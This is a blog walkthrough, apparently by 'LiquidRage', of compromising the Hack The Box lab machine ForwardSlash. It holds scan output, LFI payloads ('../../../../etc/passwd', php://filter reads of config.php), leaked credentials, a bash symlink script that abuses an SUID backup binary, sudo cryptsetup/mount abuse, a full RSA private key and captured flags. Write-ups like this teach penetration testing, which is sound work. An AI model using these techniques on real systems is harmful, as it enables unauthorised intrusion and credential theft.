FORWARD SLASH WRITEUP

NMAP SCANS

  Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-02 10:20 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Initiating Ping Scan at 10:20
    Scanning 10.10.10.183 [4 ports]
    Completed Ping Scan at 10:20, 1.04s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 10:20
    Scanning forwardslash.htb (10.10.10.183) [1000 ports]
    Discovered open port 80/tcp on 10.10.10.183
    Discovered open port 22/tcp on 10.10.10.183
    Completed SYN Stealth Scan at 10:20, 4.20s elapsed (1000 total ports)
    Initiating Service scan at 10:20
    Scanning 2 services on forwardslash.htb (10.10.10.183)
    Completed Service scan at 10:20, 6.66s elapsed (2 services on 1 host)
    Initiating OS detection (try #1) against forwardslash.htb (10.10.10.183)
    Retrying OS detection (try #2) against forwardslash.htb (10.10.10.183)
    Retrying OS detection (try #3) against forwardslash.htb (10.10.10.183)
    Retrying OS detection (try #4) against forwardslash.htb (10.10.10.183)
    Retrying OS detection (try #5) against forwardslash.htb (10.10.10.183)
    Initiating Traceroute at 10:20
    Completed Traceroute at 10:20, 0.38s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 10:20
    Completed Parallel DNS resolution of 2 hosts. at 10:20, 0.34s elapsed
    NSE: Script scanning 10.10.10.183.
    Initiating NSE at 10:20
    Completed NSE at 10:20, 12.12s elapsed
    Initiating NSE at 10:20
    Completed NSE at 10:20, 2.25s elapsed
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Nmap scan report for forwardslash.htb (10.10.10.183)
    Host is up (0.22s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 3c:3b:eb:54:96:81:1d:da:d7:96:c7:0f:b4:7e:e1:cf (RSA)
    |   256 f6:b3:5f:a2:59:e3:1e:57:35:36:c3:fe:5e:3d:1f:66 (ECDSA)
    |_  256 1b:de:b8:07:35:e8:18:2c:19:d8:cc:dd:77:9c:f2:5e (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Backslash Gang
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.80%E=4%D=6/2%OT=22%CT=1%CU=40458%PV=Y%DS=2%DC=T%G=Y%TM=5ED5DAB3
    OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(
    OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
    OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
    OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
    OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
    OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
    OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
    OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
    OS:S)

    Uptime guess: 39.164 days (since Fri Apr 24 06:25:14 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=258 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 199/tcp)
    HOP RTT       ADDRESS
    1   378.15 ms 10.10.14.1
    2   378.15 ms forwardslash.htb (10.10.10.183)

    NSE: Script Post-scanning.
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 47.82 seconds
            Raw packets sent: 1193 (56.566KB) | Rcvd: 1151 (49.594KB)

PORT 80 ENUMERATION

which has nothing interesting so lets fuzz this directory

we got a file named note.txt

After reading that note i assume their is backup site which we can access.

So i tried backupsite.htb backup.htb and many more and i got one working backup.forwardslash.htbso added this up to hosts file and accessed it

I fuzzed The url got some pages and a directory here!!

root@liquid:~/Desktop/HTB/forwardslash# gobuster dir -u http://backup.forwardslash.htb/ -w /usr/share/wordlists/wfuzz/general/big.txt -x php,txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://backup.forwardslash.htb/
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/wfuzz/general/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,txt
    [+] Timeout:        10s
    ===============================================================
    2020/06/02 11:30:44 Starting gobuster
    ===============================================================
    /config.php (Status: 200)
    /dev (Status: 301)
    /index.php (Status: 302)
    /logout.php (Status: 302)
    /login.php (Status: 200)
    Progress: 2184 / 3025 (72.20%)^C[A
    [!] Keyboard interrupt detected, terminating.
    ===============================================================
    2020/06/02 11:35:00 Finished
    ===============================================================

It has some login page so I signed up for this and went to enumerate more

I went through every page but i found nothing but their is page as Change Profile Picture

Their was link bar where we can input any url so I enabled it <br>Then as usual I tried for ../../../../../../etc/passwd

It worked as LFI
So i tried to get those files at first which we got above during fuzzing.. Because we cannot directly access those files due to encoded php files

I got interesting things in both files

Command to access those files:

php://filter/convert.base64-encode/resource=/dev/index.php php://filter/convert.base64-encode/resource=config.php

Cnfig.php

    <!--?php
    //credentials for the temp db while we recover, had to backup old config, didn't want it getting compromised -pain
    define('DB_SERVER', 'localhost');
    define('DB_USERNAME', 'www-data');
    define('DB_PASSWORD', '5iIwJX0C2nZiIhkLYE7n314VcKNx8uMkxfLvCTz2USGY180ocz3FQuVtdCy3dAgIMK3Y8XFZv9fBi6OwG6OYxoAVnhaQkm7r2ec');
    define('DB_NAME', 'site');
    
    /* Attempt to connect to MySQL database */
    $link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
    
    // Check connection
    if($link === false){
        die("ERROR: Could not connect. " . mysqli_connect_error());
    }
    ?-->

/dev/index.ph

    <?php
    if ($_SERVER['REQUEST_METHOD'] === "GET" && isset($_GET['xml'])) {

        $reg = '/ftp:\/\/[\s\S]*\/\"/';
        //$reg = '/((((25[0-5])|(2[0-4]\d)|([01]?\d?\d)))\.){3}((((25[0-5])|(2[0-4]\d)|([01]?\d?\d))))/'

        if (preg_match($reg, $_GET['xml'], $match)) {
            $ip = explode('/', $match[0])[2];
            echo $ip;
            error_log("Connecting");

            $conn_id = ftp_connect($ip) or die("Couldn't connect to $ip\n");

            error_log("Logging in");

            if (@ftp_login($conn_id, "chiv", 'N0bodyL1kesBack/')) {

                error_log("Getting file");
                echo ftp_get_string($conn_id, "debug.txt");
            }

            exit;
        }

chiv : N0bodyL1kesBack/

Here We got password for user in files So lets try these >>>>

SSH LOGIN

 
    root@liquid:~/Desktop/HTB/forwardslash# ssh chiv@10.10.10.183
    chiv@10.10.10.183's password:                                          
    Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

    * Documentation:  https://help.ubuntu.com
    * Management:     https://landscape.canonical.com
    * Support:        https://ubuntu.com/advantage

    System information as of Tue Jun  2 07:43:48 UTC 2020

    System load:  0.08               Processes:            196
    Usage of /:   30.6% of 19.56GB   Users logged in:      2
    Memory usage: 18%                IP address for ens33: 10.10.10.183
    Swap usage:   0%


    * Canonical Livepatch is available for installation.
    - Reduce system reboots and improve kernel security. Activate at:
        https://ubuntu.com/livepatch

    16 packages can be updated.
    0 updates are security updates.

    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


    Last login: Tue Jun  2 06:17:58 2020 from 10.10.14.63
    chiv@forwardslash:~$ id
    uid=1001(chiv) gid=1001(chiv) groups=1001(chiv)

But still we dont have access to user flag so for that we need to get user pain account

Lets enumerate more and more we found some backup things going on

backup file with SUID

config.php.bak with only pain’s access

After looking at those I came to know that we need md5sum timestamp crap

and I am not familiar to that so asked my friend to help me out

He gave me idea to make script in bash to get this working !!

Here it is ::


    #!/bin/bash
    i=$(backup | grep ERROR |  awk '{print $2}');
    ln -s /var/backups/config.php.bak /home/chiv/$i;
    /usr/bin/backup;

I created this with help of him!!

Here we got the password of pain !!

pain : db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704

Lets Grab user.txt

    pain@forwardslash:~$ cat user.txt 
    59f0c1034a3074b6bc6d87316a118810 

GETTING ROOT ACCESS

    pain@forwardslash:~/encryptorinator$ sudo -l
    Matching Defaults entries for pain on forwardslash:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User pain may run the following commands on forwardslash:
        (root) NOPASSWD: /sbin/cryptsetup luksOpen *
        (root) NOPASSWD: /bin/mount /dev/mapper/backup ./mnt/
        (root) NOPASSWD: /bin/umount ./mnt/
<br>

So it was difficult for me because I dont know crypto scripts SO again I took help and got password

I am actually waiting for IPPSECS video to understand this thing

So I ran command where we will decrypt img and get decrypted part in backup file which we cannot directly access as it is owned by root but we can mount it as mount has SUID

So after running these commands I got output like this

    pain@forwardslash:~/encryptorinator$ sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup
    Enter passphrase for /var/backups/recovery/encrypted_backup.img: 
    pain@forwardslash:~/encryptorinator$ sudo /bin/mount /dev/mapper/backup ./mnt/
    mount: ./mnt/: mount point does not exist.
    pain@forwardslash:~/encryptorinator$ mkdir mnt
    pain@forwardslash:~/encryptorinator$ sudo /bin/mount /dev/mapper/backup ./mnt/
    pain@forwardslash:~/encryptorinator$ cd mnt/
    pain@forwardslash:~/encryptorinator/mnt$ ls
    id_rsa
    pain@forwardslash:~/encryptorinator/mnt$ cat id_rsa 

    -----BEGIN RSA PRIVATE KEY-----
    MIIEowIBAAKCAQEA9i/r8VGof1vpIV6rhNE9hZfBDd3u6S16uNYqLn+xFgZEQBZK
    RKh+WDykv/gukvUSauxWJndPq3F1Ck0xbcGQu6+1OBYb+fQ0B8raCRjwtwYF4gaf
    yLFcOS111mKmUIB9qR1wDsmKRbtWPPPvgs2ruafgeiHujIEkiUUk9f3WTNqUsPQc
    u2AG//ZCiqKWcWn0CcC2EhWsRQhLOvh3pGfv4gg0Gg/VNNiMPjDAYnr4iVg4XyEu
    NWS2x9PtPasWsWRPLMEPtzLhJOnHE3iVJuTnFFhp2T6CtmZui4TJH3pij6wYYis9
    MqzTmFwNzzx2HKS2tE2ty2c1CcW+F3GS/rn0EQIDAQABAoIBAQCPfjkg7D6xFSpa
    V+rTPH6GeoB9C6mwYeDREYt+lNDsDHUFgbiCMk+KMLa6afcDkzLL/brtKsfWHwhg
    G8Q+u/8XVn/jFAf0deFJ1XOmr9HGbA1LxB6oBLDDZvrzHYbhDzOvOchR5ijhIiNO
    3cPx0t1QFkiiB1sarD9Wf2Xet7iMDArJI94G7yfnfUegtC5y38liJdb2TBXwvIZC
    vROXZiQdmWCPEmwuE0aDj4HqmJvnIx9P4EAcTWuY0LdUU3zZcFgYlXiYT0xg2N1p
    MIrAjjhgrQ3A2kXyxh9pzxsFlvIaSfxAvsL8LQy2Osl+i80WaORykmyFy5rmNLQD
    Ih0cizb9AoGBAP2+PD2nV8y20kF6U0+JlwMG7WbV/rDF6+kVn0M2sfQKiAIUK3Wn
    5YCeGARrMdZr4fidTN7koke02M4enSHEdZRTW2jRXlKfYHqSoVzLggnKVU/eghQs
    V4gv6+cc787HojtuU7Ee66eWj0VSr0PXjFInzdSdmnd93oDZPzwF8QUnAoGBAPhg
    e1VaHG89E4YWNxbfr739t5qPuizPJY7fIBOv9Z0G+P5KCtHJA5uxpELrF3hQjJU8
    6Orz/0C+TxmlTGVOvkQWij4GC9rcOMaP03zXamQTSGNROM+S1I9UUoQBrwe2nQeh
    i2B/AlO4PrOHJtfSXIzsedmDNLoMqO5/n/xAqLAHAoGATnv8CBntt11JFYWvpSdq
    tT38SlWgjK77dEIC2/hb/J8RSItSkfbXrvu3dA5wAOGnqI2HDF5tr35JnR+s/JfW
    woUx/e7cnPO9FMyr6pbr5vlVf/nUBEde37nq3rZ9mlj3XiiW7G8i9thEAm471eEi
    /vpe2QfSkmk1XGdV/svbq/sCgYAZ6FZ1DLUylThYIDEW3bZDJxfjs2JEEkdko7mA
    1DXWb0fBno+KWmFZ+CmeIU+NaTmAx520BEd3xWIS1r8lQhVunLtGxPKvnZD+hToW
    J5IdZjWCxpIadMJfQPhqdJKBR3cRuLQFGLpxaSKBL3PJx1OID5KWMa1qSq/EUOOr
    OENgOQKBgD/mYgPSmbqpNZI0/B+6ua9kQJAH6JS44v+yFkHfNTW0M7UIjU7wkGQw
    ddMNjhpwVZ3//G6UhWSojUScQTERANt8R+J6dR0YfPzHnsDIoRc7IABQmxxygXDo
    ZoYDzlPAlwJmoPQXauRl1CgjlyHrVUTfS0AkQH2ZbqvK5/Metq8o

Here we go with root id_rsa

   root@liquid:~/Desktop/HTB/forwardslash# vi id_rsaroot
    root@liquid:~/Desktop/HTB/forwardslash# chmod 600 id_rsaroot 
    root@liquid:~/Desktop/HTB/forwardslash# ssh -i id_rsaroot 10.10.10.183
    Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

    * Documentation:  https://help.ubuntu.com
    * Management:     https://landscape.canonical.com
    * Support:        https://ubuntu.com/advantage

    System information as of Tue Jun  2 06:55:21 UTC 2020

    System load:  0.05               Processes:            190
    Usage of /:   30.6% of 19.56GB   Users logged in:      1
    Memory usage: 18%                IP address for ens33: 10.10.10.183
    Swap usage:   0%


    * Canonical Livepatch is available for installation.
    - Reduce system reboots and improve kernel security. Activate at:
        https://ubuntu.com/livepatch

    16 packages can be updated.
    0 updates are security updates.

    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


    Last login: Tue Mar 24 12:11:46 2020 from 10.10.14.3
    root@forwardslash:~# ls
    root.txt
    root@forwardslash:~# cat root.txt 
    e78febc4934fdb81bb3b6fe14ca9dedd

So Here we are done this machine !!

I learnt lot of things from this machine

Yes it was difficult for me as crypto part took me longest

But I covered whole of this

Still crypto is difficult for me and need to know more about it

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: